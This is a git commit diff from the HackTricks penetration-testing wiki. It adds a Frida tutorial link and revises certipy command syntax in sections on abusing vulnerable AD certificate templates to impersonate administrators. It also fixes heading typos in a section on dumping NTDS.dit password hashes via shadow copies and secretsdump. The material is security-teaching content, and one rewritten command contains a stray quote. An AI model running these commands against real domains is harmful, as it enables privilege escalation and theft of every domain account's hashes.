Merge branch 'master' of github.com:carlospolop/hacktricks

2024-11-22 04:33:28 +00:00 · 2024-01-13 23:03:52 +01:00 · 2024-01-13 23:03:52 +01:00 · 32c705255a
commit 32c705255a
parent 05d24df968 cf5fa315e5
3 changed files with 8 additions and 7 deletions
--- a/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
+++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
@ -213,6 +213,7 @@ Java.choose("com.example.a11x256.frida_test.my_activity" , {
 ## Other Frida tutorials

 * [https://github.com/DERE-ad2001/Frida-Labs](https://github.com/DERE-ad2001/Frida-Labs)
+* [Part 1 of Advanced Frida Usage blog series: IOS Encryption Libraries](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/)



--- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
@ -41,14 +41,14 @@ To **find vulnerable certificate templates** you can run:

 ```bash
 Certify.exe find /vulnerable
-certipy find -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128
+certipy find -username john@corp.local -password Passw0rd -dc-ip 172.16.126.128
 ```

 To **abuse this vulnerability to impersonate an administrator** one could run:

 ```bash
 Certify.exe request /ca:dc.theshire.local-DC-CA /template:VulnTemplate /altname:localadmin
-certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -upn 'administrator@corp.local'
+certipy req -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -template 'ESC1' -upn 'administrator@corp.local'
 ```

 Then you can transform the generated **certificate to `.pfx`** format and use it to **authenticate using Rubeus or certipy** again:
@ -123,12 +123,12 @@ You can use [**Certify**](https://github.com/GhostPack/Certify) or [**Certipy**]
 ```bash
 # Request an enrollment agent certificate
 Certify.exe request /ca:CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA /template:Vuln-EnrollmentAgent
-certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'templateName'
+certipy req -username john@corp.local -password Passw0rd! -target-ip ca.corp.local' -ca 'corp-CA' -template 'templateName'

 # Enrollment agent certificate to issue a certificate request on behalf of
 # another user to a template that allow for domain authentication
 Certify.exe request /ca:CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA /template:User /onbehalfof:CORP\itadmin /enrollment:enrollmentcert.pfx /enrollcertpwd:asdf
-certipy req 'corp.local/john:Pass0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'
+certipy req -username john@corp.local -password Pass0rd! -target-ip ca.corp.local -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'

 # Use Rubeus with the certificate to authenticate as the other user
 Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password:asdf
@ -323,7 +323,7 @@ The **`SubCA`** template can be **enabled on the CA** with the `-enable-template

 ```bash
 # List templates
-certipy ca 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -enable-template 'SubCA'
+certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
 ## If SubCA is not there, you need to enable it

 # Enable SubCA
--- a/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
+++ b/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
@ -156,7 +156,7 @@ For instance, you can directly access the Domain Controller file system:

 You can abuse this access to **steal** the active directory database **`NTDS.dit`** to get all the **NTLM hashes** for all user and computer objects in the domain.

-#### Using diskshadow.exe to dumo NTDS.dit
+#### Using diskshadow.exe to dump NTDS.dit

 Using [**diskshadow**](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) you can **create a shadow copy** of the **`C` drive** and in the `F` drive for example. The, you can steal the `NTDS.dit` file from this shadow copy as it won't be in use by the system:

@ -204,7 +204,7 @@ Finally you can **get all the hashes** from the **`NTDS.dit`**:
 secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
 ```

-#### Using wbadmin.exe to dumo NTDS.dit
+#### Using wbadmin.exe to dump NTDS.dit

 Using wbadmin.exe is very similar to diskshadow.exe, the wbadmin.exe utility is a command line utility built into Windows, since Windows Vista/Server 2008.